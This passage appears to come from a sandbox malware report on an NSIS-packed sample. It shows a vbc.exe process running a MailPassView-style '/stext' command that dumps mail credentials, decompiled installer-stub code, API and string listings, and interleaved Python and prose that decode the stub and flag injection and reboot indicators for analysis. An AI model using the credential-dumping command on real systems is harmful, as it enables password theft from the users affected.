                                                                    General

                                                                    Start time:11:22:39
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                    Imagebase:0x400000
                                                                    File size:1171592 bytes
                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                      Executed Functions

                                                                      C-Code - Quality: 69%
                                                                      			_entry_() {
                                                                      				struct HINSTANCE__* _v8;
                                                                      				struct HINSTANCE__* _v12;
                                                                      				struct HINSTANCE__* _v16;
                                                                      				CHAR* _v20;
                                                                      				int _v24;
                                                                      				char _v27;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				int _v36;
                                                                      				struct _SHFILEINFOA _v388;
                                                                      				intOrPtr _t52;
                                                                      				CHAR* _t56;
                                                                      				char* _t59;
                                                                      				CHAR* _t61;
                                                                      				void* _t65;
                                                                      				intOrPtr _t67;
                                                                      				signed int _t68;
                                                                      				int _t71;
                                                                      				int _t72;
                                                                      				int _t76;
                                                                      				char _t82;
                                                                      				int _t83;
                                                                      				void* _t100;
                                                                      				void* _t110;
                                                                      				char _t112;
                                                                      				CHAR* _t118;
                                                                      				int _t119;
                                                                      				CHAR* _t120;
                                                                      				int _t121;
                                                                      				char* _t123;
                                                                      				int _t125;
                                                                      				char _t138;
                                                                      
                                                                      				_v16 = 0;
                                                                      				_v12 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                      				_v8 = 0;
                                                                      				_v24 = 0x20;
                                                                      				__imp__#17();
                                                                      				__imp__OleInitialize(0); // executed
                                                                      				 *0x42f0d0 = _t52;
                                                                      				SHGetFileInfoA(0x429440, 0,  &_v388, 0x160, 0); // executed
                                                                      				E004059A4(0x42e820, "NSIS Error");
                                                                      				_t56 = GetCommandLineA();
                                                                      				_t123 = "\"C:\\Users\\hardz\\Desktop\\aaVb1xEmrd.exe\" ";
                                                                      				E004059A4(_t123, _t56);
                                                                      				 *0x42f020 = GetModuleHandleA(0);
                                                                      				_t59 = _t123;
                                                                      				if("\"C:\\Users\\hardz\\Desktop\\aaVb1xEmrd.exe\" " == 0x22) {
                                                                      					_v24 = 0x22;
                                                                      					_t59 =  &M00435001;
                                                                      				}
                                                                      				_t61 = CharNextA(E004054C8(_t59, _v24));
                                                                      				_v20 = _t61;
                                                                      				while(1) {
                                                                      					_t112 =  *_t61;
                                                                      					_t128 = _t112;
                                                                      					if(_t112 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags = _t112 - 0x20;
                                                                      					if(_t112 != 0x20) {
                                                                      						L5:
                                                                      						__eflags =  *_t61 - 0x22;
                                                                      						_v24 = 0x20;
                                                                      						if( *_t61 == 0x22) {
                                                                      							_t61 =  &(_t61[1]);
                                                                      							__eflags = _t61;
                                                                      							_v24 = 0x22;
                                                                      						}
                                                                      						__eflags =  *_t61 - 0x2f;
                                                                      						if( *_t61 != 0x2f) {
                                                                      							L15:
                                                                      							_t61 = E004054C8(_t61, _v24);
                                                                      							__eflags =  *_t61 - 0x22;
                                                                      							if(__eflags == 0) {
                                                                      								_t61 =  &(_t61[1]);
                                                                      								__eflags = _t61;
                                                                      							}
                                                                      							continue;
                                                                      						} else {
                                                                      							_t61 =  &(_t61[1]);
                                                                      							__eflags =  *_t61 - 0x53;
                                                                      							if( *_t61 == 0x53) {
                                                                      								__eflags = (_t61[1] | 0x00000020) - 0x20;
                                                                      								if((_t61[1] | 0x00000020) == 0x20) {
                                                                      									_t12 =  &_v8;
                                                                      									 *_t12 = _v8 | 0x00000002;
                                                                      									__eflags =  *_t12;
                                                                      								}
                                                                      							}
                                                                      							__eflags =  *_t61 - 0x4352434e;
                                                                      							if( *_t61 == 0x4352434e) {
                                                                      								__eflags = (_t61[4] | 0x00000020) - 0x20;
                                                                      								if((_t61[4] | 0x00000020) == 0x20) {
                                                                      									_t15 =  &_v8;
                                                                      									 *_t15 = _v8 | 0x00000004;
                                                                      									__eflags =  *_t15;
                                                                      								}
                                                                      							}
                                                                      							__eflags =  *((intOrPtr*)(_t61 - 2)) - 0x3d442f20;
                                                                      							if( *((intOrPtr*)(_t61 - 2)) == 0x3d442f20) {
                                                                      								 *((intOrPtr*)(_t61 - 2)) = 0;
                                                                      								__eflags =  &(_t61[2]);
                                                                      								E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t61[2]));
                                                                      								L20:
                                                                      								_t118 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                      								GetTempPathA(0x400, _t118);
                                                                      								_t65 = E00403129(_t128);
                                                                      								_t129 = _t65;
                                                                      								if(_t65 != 0) {
                                                                      									L22:
                                                                      									DeleteFileA("1033"); // executed
                                                                      									_t67 = E00402C3A(_t130, _v8); // executed
                                                                      									_v12 = _t67;
                                                                      									if(_t67 != 0) {
                                                                      										L32:
                                                                      										ExitProcess(); // executed
                                                                      										__imp__OleUninitialize(); // executed
                                                                      										if(_v12 == 0) {
                                                                      											__eflags =  *0x42f0b4;
                                                                      											if( *0x42f0b4 != 0) {
                                                                      												_v8 = E00405CAA("ADVAPI32.dll", "OpenProcessToken");
                                                                      												_t119 = E00405CAA("ADVAPI32.dll", "LookupPrivilegeValueA");
                                                                      												_t71 = E00405CAA("ADVAPI32.dll", "AdjustTokenPrivileges");
                                                                      												__eflags = _v8;
                                                                      												_t125 = _t71;
                                                                      												if(_v8 != 0) {
                                                                      													__eflags = _t119;
                                                                      													if(_t119 != 0) {
                                                                      														__eflags = _t125;
                                                                      														if(_t125 != 0) {
                                                                      															_t76 = _v8(GetCurrentProcess(), 0x28,  &_v20);
                                                                      															__eflags = _t76;
                                                                      															if(_t76 != 0) {
                                                                      																 *_t119(0, "SeShutdownPrivilege",  &_v32);
                                                                      																_v36 = 1;
                                                                      																_v24 = 2;
                                                                      																 *_t125(_v20, 0,  &_v36, 0, 0, 0);
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      												_t72 = ExitWindowsEx(2, 0);
                                                                      												__eflags = _t72;
                                                                      												if(_t72 == 0) {
                                                                      													E00401410(9);
                                                                      												}
                                                                      											}
                                                                      											_t68 =  *0x42f0cc;
                                                                      											__eflags = _t68 - 0xffffffff;
                                                                      											if(_t68 != 0xffffffff) {
                                                                      												_v16 = _t68;
                                                                      											}
                                                                      											ExitProcess(_v16);
                                                                      										}
                                                                      										E0040529A(_v12, 0x200010);
                                                                      										ExitProcess(2);
                                                                      									}
                                                                      									if( *0x42f034 == 0) {
                                                                      										L31:
                                                                      										 *0x42f0cc =  *0x42f0cc | 0xffffffff;
                                                                      										_v16 = E0040352E();
                                                                      										goto L32;
                                                                      									}
                                                                      									_t121 = E004054C8(_t123, 0);
                                                                      									while(_t121 >= _t123) {
                                                                      										__eflags =  *_t121 - 0x3d3f5f20;
                                                                      										if(__eflags == 0) {
                                                                      											break;
                                                                      										}
                                                                      										_t121 = _t121 - 1;
                                                                      										__eflags = _t121;
                                                                      									}
                                                                      									_t134 = _t121 - _t123;
                                                                      									_v12 = "Error launching installer";
                                                                      									if(_t121 < _t123) {
                                                                      										_t82 = "Au_.exe"; // 0x2e5f7541
                                                                      										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                      										_v28 = _t82;
                                                                      										_t83 =  *0x409218; // 0x657865
                                                                      										_v24 = _t83;
                                                                      										lstrcatA(_t120, "~nsu.tmp");
                                                                      										CreateDirectoryA(_t120, 0);
                                                                      										_t138 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                                      										if(_t138 == 0) {
                                                                      											E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\Desktop");
                                                                      										}
                                                                      										E004059A4(0x430000, _v20);
                                                                      										E004059A4(0x430400,  &_v28);
                                                                      										_v8 = 0;
                                                                      										do {
                                                                      											_push( *((intOrPtr*)( *0x42f028 + 0x120)));
                                                                      											_push(0x428c40);
                                                                      											E004059C6(0, _t120, 0x428c40);
                                                                      											DeleteFileA(0x428c40);
                                                                      											if(_v12 == 0) {
                                                                      												goto L42;
                                                                      											}
                                                                      											if(lstrcmpiA(GetModuleFileNameA(0, 0x429040, 0x400) + 0x42903a,  &_v27) == 0) {
                                                                      												goto L32;
                                                                      											}
                                                                      											if(CopyFileA(0x429040, 0x428c40, 1) != 0) {
                                                                      												_push(0);
                                                                      												_push(0x428c40);
                                                                      												E004056F7();
                                                                      												_push(0);
                                                                      												_push(_t120);
                                                                      												E004056F7();
                                                                      												_push( *((intOrPtr*)( *0x42f028 + 0x124)));
                                                                      												_push(0x428c40);
                                                                      												E004059C6(0, _t120, 0x428c40);
                                                                      												_t100 = E00405222(0x428c40, _t120);
                                                                      												if(_t100 != 0) {
                                                                      													CloseHandle(_t100);
                                                                      													_v12 = 0;
                                                                      												}
                                                                      											}
                                                                      											L42:
                                                                      											 *0x430400 =  *0x430400 + 1;
                                                                      											_v8 = _v8 + 1;
                                                                      										} while (_v8 < 0x1a);
                                                                      										goto L32;
                                                                      									}
                                                                      									 *_t121 = 0;
                                                                      									_t122 = _t121 + 4;
                                                                      									if(E0040557D(_t134, _t121 + 4) == 0) {
                                                                      										goto L32;
                                                                      									}
                                                                      									E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t122);
                                                                      									E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t122);
                                                                      									_v12 = 0;
                                                                      									goto L31;
                                                                      								}
                                                                      								GetWindowsDirectoryA(_t118, 0x3fb);
                                                                      								lstrcatA(_t118, "\\Temp");
                                                                      								_t110 = E00403129(_t129);
                                                                      								_t130 = _t110;
                                                                      								if(_t110 == 0) {
                                                                      									goto L32;
                                                                      								}
                                                                      								goto L22;
                                                                      							}
                                                                      							goto L15;
                                                                      						}
                                                                      					} else {
                                                                      						goto L4;
                                                                      					}
                                                                      					do {
                                                                      						L4:
                                                                      						_t61 =  &(_t61[1]);
                                                                      						__eflags =  *_t61 - 0x20;
                                                                      					} while ( *_t61 == 0x20);
                                                                      					goto L5;
                                                                      				}
                                                                      				goto L20;
                                                                      			}
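The decompiled entry point above is the stock NSIS installer stub (the "NSIS Error" string and the ~nsu.tmp\Au_.exe uninstaller copy identify it), and its switch handling reads far more easily once the dword compares are decoded: 0x4352434e, 0x3d442f20 and 0x3d3f5f20 are the little-endian bytes of "NCRC", " /D=" and " _?=", and 0x2e5f7541 is "Au_.". The Python below is an added example, not code from the report or from NSIS. It mirrors the argument loop and the backwards marker scan exactly as decompiled, uses the flag bits the code ORs into _v8 (2 for /S, 4 for /NCRC), and the result field names and helper names are this example's own.

```python
"""Added example (not from the report or from NSIS): a readable mirror of the
option scan in the decompiled NSIS stub _entry_() above."""
import struct

# Little-endian dword constants lifted from the decompiled function.
NCRC_DWORD = 0x4352434E      # compared against *_t61 after the '/'
INSTDIR_DWORD = 0x3D442F20   # compared against *(_t61 - 2)
UNINST_DWORD = 0x3D3F5F20    # scanned backwards over the whole command line
AU_DWORD = 0x2E5F7541        # _t82: first four bytes of the "Au_.exe" temp name

FLAG_SILENT = 0x2            # _v8 |= 2 on /S
FLAG_NOCRC = 0x4             # _v8 |= 4 on /NCRC


def dword_to_ascii(value: int) -> str:
    """The 4 bytes an x86 'cmp dword' against this constant actually matches."""
    return struct.pack("<I", value).decode("ascii")


def _scan_to(cmd: str, i: int, term: str) -> int:
    """Equivalent of E004054C8: advance to the terminator char (or the end)."""
    while i < len(cmd) and cmd[i] != term:
        i += 1
    return i


def parse_nsis_cmdline(cmd: str) -> dict:
    """Mirror of the argument loop: skip the (possibly quoted) program path,
    then walk tokens. '/S' and '/NCRC' only count when followed by a space or
    the end of the line ((c | 0x20) == 0x20), and ' /D=' swallows the rest of
    the line as the install directory, after which the stub stops parsing."""
    flags, install_dir = 0, None
    quoted = cmd.startswith('"')
    i = _scan_to(cmd, 1 if quoted else 0, '"' if quoted else " ")
    if i < len(cmd) and cmd[i] == '"':
        i += 1                                   # CharNextA past the closing quote
    while i < len(cmd):
        while i < len(cmd) and cmd[i] == " ":    # the L4 loop
            i += 1
        if i >= len(cmd):
            break
        term = " "
        if cmd[i] == '"':                        # quoted token: terminator 0x22
            i += 1
            term = '"'
        if cmd[i:i + 1] == "/":
            i += 1
            nxt = cmd[i + 1:i + 2]
            if cmd[i:i + 1] == "S" and nxt in ("", " "):
                flags |= FLAG_SILENT
            nxt = cmd[i + 4:i + 5]
            if cmd[i:i + 4] == dword_to_ascii(NCRC_DWORD) and nxt in ("", " "):
                flags |= FLAG_NOCRC
            if i >= 2 and cmd[i - 2:i + 2] == dword_to_ascii(INSTDIR_DWORD):
                install_dir = cmd[i + 2:]        # remainder of the line; goto L20
                break
        i = _scan_to(cmd, i, term)               # L15
        if i < len(cmd) and cmd[i] == '"':
            i += 1
    return {"flags": flags, "install_dir": install_dir}


def split_uninstaller_marker(cmd: str):
    """The backwards ' _?=' scan (L5044 onward): the relaunched uninstaller
    copy (~nsu.tmp\\Au_.exe) receives the install directory after that marker
    and the stub NUL-terminates the command line at the marker.
    Returns (command line before the marker, directory) or None."""
    idx = cmd.rfind(dword_to_ascii(UNINST_DWORD))
    if idx < 0:
        return None
    return cmd[:idx], cmd[idx + 4:]


if __name__ == "__main__":
    for const in (NCRC_DWORD, INSTDIR_DWORD, UNINST_DWORD, AU_DWORD):
        print(hex(const), repr(dword_to_ascii(const)))
    print(parse_nsis_cmdline('"C:\\Users\\user\\Desktop\\aaVb1xEmrd.exe" /S /NCRC /D=C:\\Program Files\\App'))
```

Two details matter when reading the stub in a malware context. The /S test is case-sensitive (the compare is against 0x53, uppercase only), so a dropper that wants a silent install has to use the exact switch, and ' /D=' must be the last argument because everything after it is taken verbatim as the directory. The ' _?=' branch is why an NSIS uninstaller shows up as a second copy of the executable in Temp: the original copies itself to ~nsu.tmp\Au_.exe and relaunches that copy with the marker appended, which is benign NSIS behaviour and not by itself a sign of the HawkEye payload.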

                                                                      Instruction address column of the disassembly viewer for _entry_() (0x0040316b to 0x004034f3) omitted; the addresses carry no information beyond the function's range.
                                                                      0x004034f8
                                                                      0x004034fb
                                                                      0x004034fd
                                                                      0x004034fd
                                                                      0x00403503
                                                                      0x00403503
                                                                      0x0040334a
                                                                      0x00403351
                                                                      0x00403351
                                                                      0x004032d2
                                                                      0x0040331f
                                                                      0x0040331f
                                                                      0x0040332b
                                                                      0x00000000
                                                                      0x0040332b
                                                                      0x004032db
                                                                      0x004032e8
                                                                      0x004032df
                                                                      0x004032e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004032e7
                                                                      0x004032e7
                                                                      0x004032e7
                                                                      0x004032ec
                                                                      0x004032ee
                                                                      0x004032f5
                                                                      0x00403357
                                                                      0x0040335c
                                                                      0x00403361
                                                                      0x00403364
                                                                      0x0040336f
                                                                      0x00403372
                                                                      0x00403379
                                                                      0x0040337f
                                                                      0x00403385
                                                                      0x00403391
                                                                      0x00403391
                                                                      0x0040339e
                                                                      0x004033ac
                                                                      0x004033b1
                                                                      0x004033b9
                                                                      0x004033be
                                                                      0x004033c4
                                                                      0x004033c5
                                                                      0x004033cb
                                                                      0x004033d4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403410
                                                                      0x00403412
                                                                      0x00403413
                                                                      0x00403414
                                                                      0x00403419
                                                                      0x0040341a
                                                                      0x0040341b
                                                                      0x00403425
                                                                      0x0040342b
                                                                      0x0040342c
                                                                      0x00403433
                                                                      0x0040343a
                                                                      0x0040343d
                                                                      0x00403443
                                                                      0x00403443
                                                                      0x0040343a
                                                                      0x00403446
                                                                      0x00403446
                                                                      0x0040344c
                                                                      0x0040344f
                                                                      0x00000000
                                                                      0x00403459
                                                                      0x004032f7
                                                                      0x004032f9
                                                                      0x00403304
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040330c
                                                                      0x00403317
                                                                      0x0040331c
                                                                      0x00000000
                                                                      0x0040331c
                                                                      0x00403298
                                                                      0x004032a4
                                                                      0x004032a9
                                                                      0x004032ae
                                                                      0x004032b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004032b0
                                                                      0x00000000
                                                                      0x0040324e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403202
                                                                      0x00403202
                                                                      0x00403202
                                                                      0x00403203
                                                                      0x00403203
                                                                      0x00000000
                                                                      0x00403202
                                                                      0x00000000

                                                                      APIs
                                                                      • #17.COMCTL32 ref: 0040317C
                                                                      • OleInitialize.OLE32(00000000), ref: 00403183
                                                                      • SHGetFileInfoA.SHELL32(00429440,00000000,?,00000160,00000000), ref: 004031A1
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                      • GetCommandLineA.KERNEL32(0042E820,NSIS Error), ref: 004031B6
                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 004031C9
                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000020), ref: 004031F2
                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403283
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403298
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032A4
                                                                      • DeleteFileA.KERNELBASE(1033), ref: 004032B7
                                                                      • ExitProcess.KERNEL32(?), ref: 0040332E
                                                                      • OleUninitialize.OLE32(?), ref: 00403333
                                                                      • ExitProcess.KERNEL32 ref: 00403351
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000,?), ref: 00403372
                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000,?), ref: 00403379
                                                                      • DeleteFileA.KERNEL32(00428C40,00428C40,?,00430400,?,00430000,?), ref: 004033CB
                                                                      • GetModuleFileNameA.KERNEL32(00000000,00429040,00000400), ref: 004033E1
                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 004033F2
                                                                      • CopyFileA.KERNEL32(00429040,00428C40,00000001), ref: 00403408
                                                                      • CloseHandle.KERNEL32(00000000,00428C40,C:\Users\user\AppData\Local\Temp\,00428C40,?,C:\Users\user\AppData\Local\Temp\,00000000,00428C40,00000000), ref: 0040343D
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 004034AA
                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 004034E2
                                                                      • ExitProcess.KERNEL32 ref: 00403503
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: File$ExitProcess$DeleteDirectoryHandleModuleWindowslstrcat$CharCloseCommandCopyCreateCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                      • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\aaVb1xEmrd.exe" $1033$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                      • API String ID: 4176089003-72506846
                                                                      • Opcode ID: 4d6744f3ce6c7f3ed4729e5111d50859de650be46e9e489b668c6c702f79bd3f
                                                                      • Instruction ID: f60237c2c2551a273f7310616d20ac7be133654c6b16f68466d4dbf6d89f6539
                                                                      • Opcode Fuzzy Hash: 4d6744f3ce6c7f3ed4729e5111d50859de650be46e9e489b668c6c702f79bd3f
                                                                      • Instruction Fuzzy Hash: 28A19070904245BEDB21AFA19D4ABAF7EBCAB05309F5440BBF101B61D2C77C5A418B2E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
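The APIs and Memory Dump Source lines above are worth reading mechanically rather than by eye: the dump names carry the page protection of each region (0x20 for the executable .text at 0x401000, 0x02 for the read-only header and .rdata, 0x04 for writable data), and the API sequence GetCurrentProcess/OpenProcessToken/LookupPrivilegeValueA/AdjustTokenPrivileges followed by ExitWindowsEx(00000002, ...) is the stub acquiring SeShutdownPrivilege and requesting a reboot (EWX_REBOOT). The following Python is an added example, not part of the Joe Sandbox report or of NSIS: it parses both line formats and flags writable-and-executable dump regions (an injection artefact) and the privilege-then-reboot sequence. The field layout of the dump name (process index, stage, dump id, base address, page protection, allocation type) is an assumption inferred from the values on this page; the sample lines are copied from this function's block, and the single RWX dump name is constructed to exercise the check.

```python
"""Added example: parse the 'Memory Dump Source' and 'APIs' lines of a
Joe Sandbox function block and flag writable+executable dump regions and
the AdjustTokenPrivileges -> ExitWindowsEx(EWX_REBOOT) sequence."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Page protection constants from winnt.h
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
EWX_REBOOT = 0x00000002  # ExitWindowsEx flag from winuser.h

# ASSUMED dump-name layout (not documented on the page; the protection field
# matches the winnt.h PAGE_* values for the regions listed above):
#   <process idx>.<stage>.<dump id>.<base address>.<page protection>.<allocation type>.sdmp
DUMP_RE = re.compile(
    r"(\d+)\.(\d+)\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp")

# One API line: "• Name.MODULE(args), ref: ADDR"; the argument list and the
# "Part of subcall function ...:" prefix are optional.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([#\w]+)\.([A-Za-z0-9]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})\s*$")


@dataclass
class DumpRegion:
    process: int
    stage: int
    dump_id: int
    base: int
    protect: int
    alloc_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall: bool = False


def parse_dump_name(name: str) -> Optional[DumpRegion]:
    m = DUMP_RE.search(name)
    if not m:
        return None
    proc, stage, dump_id, base, prot, alloc = m.groups()
    return DumpRegion(int(proc), int(stage), int(dump_id),
                      int(base, 16), int(prot, 16), int(alloc, 16))


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_RE.match(line)
    if not m:
        return None
    name, module, args, ref = m.groups()
    arglist = [a.strip() for a in args.split(",")] if args else []
    return ApiCall(name, module, arglist, int(ref, 16),
                   subcall="Part of subcall" in line)


def rwx_regions(names: List[str]) -> List[DumpRegion]:
    """Dump regions whose protection is both writable and executable."""
    return [r for r in map(parse_dump_name, names) if r and r.executable and r.writable]


def reboot_indicators(lines: List[str]) -> Optional[Tuple[int, int]]:
    """(privilege-adjust ref, ExitWindowsEx ref) when AdjustTokenPrivileges is
    resolved and ExitWindowsEx is later called with EWX_REBOOT set."""
    calls = [c for c in map(parse_api_line, lines) if c]
    priv = [c.ref for c in calls
            if c.name == "AdjustTokenPrivileges" or "AdjustTokenPrivileges" in c.args]
    reboots = [c.ref for c in calls
               if c.name == "ExitWindowsEx" and c.args and c.args[0] != "?"
               and int(c.args[0], 16) & EWX_REBOOT]
    if priv and reboots and priv[0] < reboots[0]:
        return priv[0], reboots[0]
    return None


# Sample input copied from this function's report block, plus one CONSTRUCTED
# RWX dump name (not from the report) to exercise the injection check.
REPORT_DUMP_NAMES = [
    "00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp",
    "00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp",
    "00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp",
    "00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp",
]
HYPOTHETICAL_RWX = "00000001.00000002.000000001.0000000002A00000.00000040.00020000.sdmp"
REPORT_API_LINES = [
    r'• #17.COMCTL32 ref: 0040317C',
    r'• OleInitialize.OLE32(00000000), ref: 00403183',
    r'  • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1',
    r'• CharNextA.USER32(00000000,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000020), ref: 004031F2',
    r'• GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 004034AA',
    r'• ExitWindowsEx.USER32(00000002,00000000), ref: 004034E2',
    r'• ExitProcess.KERNEL32 ref: 00403503',
]

if __name__ == "__main__":
    print("W+X regions:", rwx_regions(REPORT_DUMP_NAMES + [HYPOTHETICAL_RWX]))
    print("reboot sequence:", reboot_indicators(REPORT_API_LINES))
```

On this block the real dump names yield no W+X region (the stub's own image is mapped with normal section protections); the hollowing reported elsewhere on the page would show up as a 0x40 region in the target process's dumps, which is what the constructed name stands in for. The reboot check returns the pair (0x4034AA, 0x4034E2), i.e. the privilege-resolution site and the ExitWindowsEx call.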

                                                                      C-Code - Quality: 89%
                                                                      			E0040352E() {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				int _v12;
                                                                      				int _v16;
                                                                      				char _v20;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t20;
                                                                      				void* _t28;
                                                                      				void* _t30;
                                                                      				int _t31;
                                                                      				void* _t34;
                                                                      				struct HINSTANCE__* _t37;
                                                                      				int _t38;
                                                                      				int _t42;
                                                                      				char _t61;
                                                                      				CHAR* _t63;
                                                                      				signed char _t67;
                                                                      				CHAR* _t78;
                                                                      				intOrPtr _t80;
                                                                      				CHAR* _t82;
                                                                      				CHAR* _t84;
                                                                      				CHAR* _t85;
                                                                      
                                                                      				_t80 =  *0x42f028;
                                                                      				_t20 = E00405CAA("KERNEL32.dll", "GetUserDefaultUILanguage");
                                                                      				_t88 = _t20;
                                                                      				if(_t20 == 0) {
                                                                      					_t78 = 0x42a488;
                                                                      					"1033" = 0x7830;
                                                                      					E00405898(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a488);
                                                                      					__eflags =  *0x42a488;
                                                                      					if(__eflags == 0) {
                                                                      						E00405898(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072E2, 0x42a488);
                                                                      					}
                                                                      					lstrcatA("1033", _t78);
                                                                      				} else {
                                                                      					E00405902("1033",  *_t20() & 0x0000ffff);
                                                                      				}
                                                                      				E004037FA(_t75, _t88);
                                                                      				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                      				 *0x42f0a0 =  *0x42f030 & 0x00000020;
                                                                      				if(E0040557D(_t88, _t84) != 0) {
                                                                      					L16:
                                                                      					if(E0040557D(_t96, _t84) == 0) {
                                                                      						_push( *((intOrPtr*)(_t80 + 0x118)));
                                                                      						_push(_t84);
                                                                      						E004059C6(0, _t78, _t80);
                                                                      					}
                                                                      					_t28 = LoadImageA( *0x42f020, 0x67, 1, 0, 0, 0x8040); // executed
                                                                      					 *0x42e808 = _t28;
                                                                      					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                                      						L21:
                                                                      						if(E00401410(0) == 0) {
                                                                      							_t30 = E004037FA(_t75, __eflags);
                                                                      							__eflags =  *0x42f0c0;
                                                                      							if( *0x42f0c0 != 0) {
                                                                      								_t31 = E00404E3B(_t30, 0);
                                                                      								__eflags = _t31;
                                                                      								if(_t31 == 0) {
                                                                      									E00401410(1);
                                                                      									goto L33;
                                                                      								}
                                                                      								__eflags =  *0x42e7ec;
                                                                      								if( *0x42e7ec == 0) {
                                                                      									E00401410(2);
                                                                      								}
